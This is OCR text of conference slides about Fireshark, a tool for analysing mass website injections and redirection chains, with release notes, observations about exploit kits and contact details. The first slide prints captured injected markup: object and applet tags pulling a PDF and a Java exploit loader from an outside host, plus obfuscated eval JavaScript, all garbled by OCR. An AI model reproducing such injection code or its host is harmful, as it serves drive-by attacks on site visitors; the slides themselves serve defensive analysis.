
< object height="l" width="l" 

data="http : //'upl evel grano. vn. ua/lll/sv777/pdf . php" type="appl i cati on/pdf " 

<paranro value="l. pdf " narce="src" /> 

</object> 

-^applet height = "2 55" v;idth="462" archi ve=" window. jar " 

code="dev. 5. AdqredY. dass"> 

-^param val ue="nttp : //upl evel gmno. vn. ua/lll/sv777/l oad. php?spl =javad" 

name="data" /> 

<param value="l" name="cc" /> 

</appl et > 



aval ('edc = e ' *tt+ ' 1 ; ' ) ; 

eval < ' function lalaO (rx) { return set_fdh (rx) ; } ' ) ; 

for <i=0:i<12 ;!++){ 

var i_plus = 1+1; 

r+=' Function lala'+i_plus+' (rx) {return lala'+i+' (1 
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Observations from Injection attack #3 



The bad guys are tracking/hiding, redundancy redirectors 
are common 

Exploits that are being used are current e.g. all 
platforms/browsers are targeted 

Exploit kits are easily attainable, setup is quick 

Many kits serve user polymorphic exploits/malware, thus 
traditional AV signatures are always behind 
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From 1.0 to 1.1. 






ESHARK RELEASES 



^1 

Fireshark 1.0 




Released Blackhat Europe 
April 2010 


- Firefox Browser-Plugin 

- PERL Post processing 

- CYMRUASN 

- GraphViz 
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Fireshark 1.0 




YAML Log format 


Scripts: 

GraphViz.pl 

lngressEgress.pl 
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Fireshark 1.1 (Release in November 10') 



XULGUI Front-end 

- Shows network traffic 

- Redirection chains 

- DOM/SOURCE/DIFF 

- Top Destination and Source URLs 

- Suspected Redirectors/Exploit Sites 



Configurable options 



Output in JSON (1 .0 was in YAML) 
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Get it!... 



RESHARK 
WHERE TO DOWNLOAD 



Download Fireshark 1.0 



http://fireshark.org/ 



The Fireshark 
Project 



Free (GPL v3) 

Open Source 

PERL/Python scripts 
included for post- 
processing 
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The end... 



CLUSION + Q&A 



Conclusions/Take-away 



Compromised websites: 

- Increase of 225% over the last 12 months 

- Frequently updated to contain fresh links 

Current tools are insufficient if desire is to monitor 
and analyze mass URL injections 

Use Fireshark for: 

- Mass Injection Analysis 

- Redirection Chaining 

- Content Profiling 
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Questions? 



Contact: 

Stephan Chenette 
Twitter: StephanChenette 
Email: stephan@packetsector.net 

Fireshark Feedback: 

Join the Fireshark mailing list!! or., 
send an email to feedback@fireshark.org 
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